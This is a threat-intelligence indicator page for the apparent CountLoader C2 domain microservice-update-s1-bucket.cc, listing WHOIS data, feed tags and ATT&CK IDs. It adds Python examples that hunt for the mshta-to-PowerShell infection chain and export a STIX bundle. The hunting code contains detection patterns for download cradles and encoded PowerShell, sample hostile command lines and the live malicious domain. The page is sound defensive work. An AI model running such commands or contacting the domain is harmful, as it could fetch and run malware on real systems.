Domain · Medium · Signal 66/100
microservice-update-s1-bucket.cc
First Seen
Dec 11, 2025
Last Seen
May 24, 2026
Found in 14 reports. Confidence: medium. · Confidence scores are heuristic. Verify before acting on results.
Domain Name
Malicious domain used for C2, phishing, or malware distribution.
MISP Category
Network Activity
Confidence
66%
Signal Score
66 / 100
IDS Rule
No
Threat Context
Feed Intelligence Summary
14 source reports · 66% confidence score
Category tags
abuse · abusech-threatfox-c2cacr · acr stealer · active scan · active scanning · alienvault_ransomware · amatera · amaterastealer · apk · arm · ascii · asyncrat · automated hunt · automated threat · automated-hunt · automated_attack · backdoor · bad reputation · banker · base64-loader · bash · bat · botnet · botnet activity · botnetdomain · brute force · brute_force · c2 · c2 communication · c2 https · censys · cloaking · cobalt-strike · cobaltstrike · coinminer · command & control · command and control · command execution · communication protocol · compromise ioc · config · countloader · countloader c2 · credential access · credential harvesting · credential stuffing · credential theft · cryptocurrency · da6ah3dapato · data encryption · data exfiltration · data store exposure · ddos · ddos attacks · distributed attacks · domains · dropped-by-amadey · elf · encoded · encryption · exe · executable file · exfiltration · exodus · exploitation activity · extortion · figure · finance · finance and insurance · fraud · ftp · ftp brute force · gafgyt · gh0strat · goceqc6sk · goproxy · hajime · howler cell · hta script · http brute force · http scanner · https · identity & access exploitation · idm · indicator · information stealer · infostealer · ingress tool transfer · initial hta · injection activity · internet of things · iocs · iot botnet · iot security · iot/ics attack · jscript · json · jwt token · loader · loader https · lummastealer · m68k · malicious powershell activity · malicious software · malvertising · malware · malware activity · maskgramstealer · medusalocker · metasploit · mips · mirai · mirai botnet · mobile threat · mozi · mshta · msil · network · network discovery · network intrusion attempts · network scanning · network security · north america · novel-ioc · novel_ioc · opendir · osint-volley · paraguay · password stealing · pattern 49 · pattern-49 · payload · phishing · phishing attack · powerpc · powershell · precog · process injection · protocol exploitation · proxy · ps url · ps1 · python · quasar · quasar-rat · quasarrat · ransomware · rat · reconnaissance · remote access · remote services · researched · rnuarbvf url · rustystealer · saint helena, ascension and tristan da cunha · scams & fraud · scripting attacks · sh · shellcode injection · sliver · smartloader · social engineering · sparc · spymax · ssh attack · sshdkit · stealc · superh · supply chain attack · system disruption · tcp scan · team · telnet threat · threat actor · tor node · traitor · trojan · trojan malware · ua-wget · udp scan · united states · unknown malware · unknown-malware · unknown-stealer · urls https · vanillarat · vidar · wallstealer · web traffic · x86 · xworm · z5brjsogj789 · zip
MITRE ATT&CK technique IDs present in the tag list
T1008 · T1018 · T1021 · T1021.001 · T1027 · T1040 · T1041 · T1047 · T1053 · T1053.005 · T1055 · T1059 · T1059.001 · T1059.007 · T1068 · T1069 · T1071 · T1071.001 · T1076 · T1078 · T1083 · T1086 · T1087 · T1091 · T1102 · T1102.001 · T1105 · T1110 · T1110.002 · T1115 · T1132 · T1133 · T1134 · T1140 · T1189 · T1190 · T1197 · T1202 · T1204 · T1204.002 · T1218 · T1482 · T1486 · T1490 · T1496 · T1499.002 · T1499.003 · T1518 · T1539 · T1553 · T1555 · T1560 · T1563 · T1565 · T1566 · T1566.001 · T1566.002 · T1566.003 · T1567.001 · T1573 · T1595 · T1595.001 · T1595.002 · T1595.003
Note: these tags are the union of labels attached by all 14 source reports to this feed, not all of which describe this domain; only the CountLoader, loader, mshta and PowerShell tags are backed by the description and references below.
Activity Timeline
Threat Activity Heatmap (figure not reproduced). Peak activity: 2026-05-24.
Sightings by window: last 24h 0 (dormant) · last 7d 0 (dormant) · last 30d 0 (dormant) · last 3 months 1 (minimal)
Threat Score: Medium Risk · Signal 66 · Confidence 66% · Reports 14 · First seen Dec 11, 2025 · Last seen May 24, 2026
VirusTotal
Not checked
WHOIS
- description
- The recent CountLoader campaign, identified by McAfee Labs, uses a multi-stage infection chain with several layers of obfuscation. The attackers deliver the payload through a series of loaders, including PowerShell scripts and obfuscated JavaScript executed via mshta.exe. Each stage is built to stay hidden, and the final stages use in-memory shellcode injection, which further complicates detection.
- domain rank
- -1
- raw
  - Domain name: microservice-update-s1-bucket.cc
  - Domain registrar id: 3765.0
  - Create date: 2025-12-08 00:00:00
  - Update date: 2025-12-08 00:00:00
  - Expiry date: 2026-12-08 00:00:00
  - Query time: 2025-12-11 19:06:33
  - Name server 1: norman.ns.cloudflare.com
  - Name server 2: indie.ns.cloudflare.com
  - Registrant name: 1f8f4166599d23ee
  - Registrant email: 9253e579452ffad5s@
  - Registrant city: 1f8f4166599d23ee
  - Registrant state: 7043151881d2a7f0
  - Registrant zip: 1f8f4166599d23ee
  - Registrant country: Hong Kong
  - Administrative city: REDACTED FOR PRIVACY
  - Administrative state: HK
  - Administrative country: Hong Kong
  - Technical city: REDACTED FOR PRIVACY
  - Technical state: HK
  - Technical country: Hong Kong
  - Billing city: REDACTED FOR PRIVACY
  - Billing state: HK
  - Billing country: Hong Kong
  - Note: the WHOIS query (2025-12-11) ran three days after the domain's creation date, the registrant fields hold opaque hash-like values rather than names, and both name servers are Cloudflare's, so this record identifies neither the registrant nor the origin host. Treat the Hong Kong location as registrar boilerplate, not attribution.
- references
  - https://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader
  - https://www.huorong.cn/document/tech/vir_report/1889
  - https://urlhaus.abuse.ch/browse/
  - https://analytics.dugganusa.com/api/v1/stix/master
  - https://github.com/pduggusa/dugganusa-research
- subdomains count
- 0
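The infection chain in the description above (mshta.exe running obfuscated script, PowerShell loaders, and this domain as the C2) translates into a small hunt. The following is an added example, not code from this page, the feed, or the cited reports: it applies three process heuristics plus the page's domain indicator to constructed Sysmon-style process and DNS events, then correlates hits per host, because one encoded PowerShell launch is weak evidence while several chain stages on the same host are not. The event field names, the regular expressions and the sample events are assumptions.

```python
import re
from collections import defaultdict

# Indicator taken from this page; everything else in this file is an assumption.
IOC_DOMAIN = "microservice-update-s1-bucket.cc"

# mshta.exe launched with a remote HTA or an inline javascript:/vbscript: body.
MSHTA_RE = re.compile(r'\bmshta(?:\.exe)?\b.*?(?:"?https?://|javascript:|vbscript:)', re.I)
# PowerShell with an encoded command or a classic download cradle.
PS_RE = re.compile(
    r'\bpowershell(?:\.exe)?\b.*?'
    r'(?:-e(?:nc|ncodedcommand)?\b|downloadstring|\biex\b|invoke-expression|frombase64string)',
    re.I,
)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


def is_ioc_domain(name):
    """Exact or subdomain match against the reported C2 domain."""
    n = name.lower().rstrip(".")
    return n == IOC_DOMAIN or n.endswith("." + IOC_DOMAIN)


def classify(event):
    """Return the (rule, detail) pairs one event triggers; [] for benign events."""
    hits = []
    if event["type"] == "process":
        cmd = event.get("cmdline", "")
        parent = event.get("parent", "").lower()
        if MSHTA_RE.search(cmd):
            hits.append(("mshta_remote_or_inline_script", cmd))
        if PS_RE.search(cmd):
            hits.append(("powershell_encoded_or_cradle", cmd))
        if parent in SCRIPT_HOSTS and "powershell" in cmd.lower():
            hits.append(("script_host_spawned_powershell", f"{parent} -> powershell"))
    elif event["type"] == "dns" and is_ioc_domain(event.get("query", "")):
        hits.append(("dns_query_to_reported_c2", event["query"]))
    return hits


def hunt(events):
    """Flat list of findings, one per (event, rule) hit."""
    return [
        {"host": ev["host"], "rule": rule, "detail": detail}
        for ev in events
        for rule, detail in classify(ev)
    ]


def correlated_hosts(findings, min_rules=2):
    """Hosts on which at least min_rules distinct chain stages fired."""
    rules_by_host = defaultdict(set)
    for f in findings:
        rules_by_host[f["host"]].add(f["rule"])
    return sorted(h for h, rules in rules_by_host.items() if len(rules) >= min_rules)


# Constructed sample telemetry (not real data). ws01 shows the full chain,
# ws03 only an encoded PowerShell launch from explorer.exe, ws02 nothing of note.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "parent": "winword.exe",
     "cmdline": 'mshta.exe "https://example.invalid/update.hta"'},
    {"type": "process", "host": "ws01", "parent": "mshta.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"type": "dns", "host": "ws01", "query": "microservice-update-s1-bucket.cc", "answer": "198.51.100.7"},
    {"type": "process", "host": "ws02", "parent": "explorer.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"type": "dns", "host": "ws02", "query": "update.example.com", "answer": "198.51.100.8"},
    {"type": "process", "host": "ws03", "parent": "explorer.exe",
     "cmdline": "powershell.exe -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAA="},
]

if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['host']:5} {f['rule']:32} {f['detail']}")
    print("hosts with a correlated chain:", correlated_hosts(found))
```

On the constructed events, ws01 fires all four rules and is the only host returned by `correlated_hosts`; ws03's lone encoded command stays a single finding for an analyst to triage rather than an alert. The DNS check is the only rule tied to this page's indicator, and the page reports zero subdomains, so the suffix match is there for completeness rather than because subdomains were observed.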
Export & API: STIX 2.1 bundle · CSV export · Permalink
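The STIX 2.1 export offered above can be reproduced from the record's own fields. This added example is not the site's exporter (its output is not shown on this page): it builds a minimal bundle with an Indicator carrying the domain pattern, valid_from set to the first-seen date and confidence set to the page's 66, a Malware object for CountLoader (the family the description and tags name) and an "indicates" relationship, plus a matcher that checks an observed DNS name against the bundle's domain patterns. The object IDs, the time of day in valid_from (the page gives only the date), the malware_types value and the label set are assumptions.

```python
import json
import re
import uuid
from datetime import datetime, timezone

# Fields taken from this page.
IOC_DOMAIN = "microservice-update-s1-bucket.cc"
FIRST_SEEN = "2025-12-11T00:00:00.000Z"   # First Seen: Dec 11, 2025 (time of day assumed)
CONFIDENCE = 66                           # Confidence: 66%
LABELS = ["countloader", "c2"]            # chosen from the page's tag list (assumption)


def _stix_id(stix_type):
    return f"{stix_type}--{uuid.uuid4()}"


def _timestamp():
    return datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")


def build_bundle(domain=IOC_DOMAIN, first_seen=FIRST_SEEN, confidence=CONFIDENCE):
    """Indicator + Malware + 'indicates' relationship, wrapped in a STIX 2.1 bundle."""
    ts = _timestamp()
    malware = {
        "type": "malware", "spec_version": "2.1", "id": _stix_id("malware"),
        "created": ts, "modified": ts,
        "name": "CountLoader", "is_family": True,
        "malware_types": ["downloader"],      # assumption: the page only calls it a loader
    }
    indicator = {
        "type": "indicator", "spec_version": "2.1", "id": _stix_id("indicator"),
        "created": ts, "modified": ts,
        "name": f"C2 domain {domain}",
        "indicator_types": ["malicious-activity"],
        "pattern": f"[domain-name:value = '{domain}']",
        "pattern_type": "stix",
        "valid_from": first_seen,
        "confidence": confidence,
        "labels": list(LABELS),
    }
    relationship = {
        "type": "relationship", "spec_version": "2.1", "id": _stix_id("relationship"),
        "created": ts, "modified": ts,
        "relationship_type": "indicates",
        "source_ref": indicator["id"], "target_ref": malware["id"],
    }
    return {"type": "bundle", "id": _stix_id("bundle"),
            "objects": [indicator, malware, relationship]}


def bundle_json(bundle):
    return json.dumps(bundle, indent=2)


# Only the simple single-comparison domain pattern is parsed here; a real
# consumer would run a STIX pattern parser instead of a regex.
_DOMAIN_PATTERN = re.compile(r"^\[domain-name:value\s*=\s*'([^']+)'\]$")


def domains_in_bundle(bundle):
    """Domain values from every stix-pattern Indicator in the bundle."""
    found = set()
    for obj in bundle["objects"]:
        if obj.get("type") == "indicator" and obj.get("pattern_type") == "stix":
            m = _DOMAIN_PATTERN.match(obj["pattern"])
            if m:
                found.add(m.group(1).lower())
    return found


def observed_domain_matches(bundle, observed):
    """True when an observed DNS name equals, or is a subdomain of, an indicator domain."""
    name = observed.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in domains_in_bundle(bundle))


if __name__ == "__main__":
    b = build_bundle()
    print(bundle_json(b))
    print(observed_domain_matches(b, "microservice-update-s1-bucket.cc."))
```

The confidence and valid_from values come straight from the record, which is the point: a consumer that filters on confidence below 70 or that expires indicators after their last-seen date would drop this one automatically, which is the behaviour the page's "verify before acting" note calls for.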
IOC Journey: medium. First detected 6 months ago, last seen 1 month ago; appeared in 14 threat reports.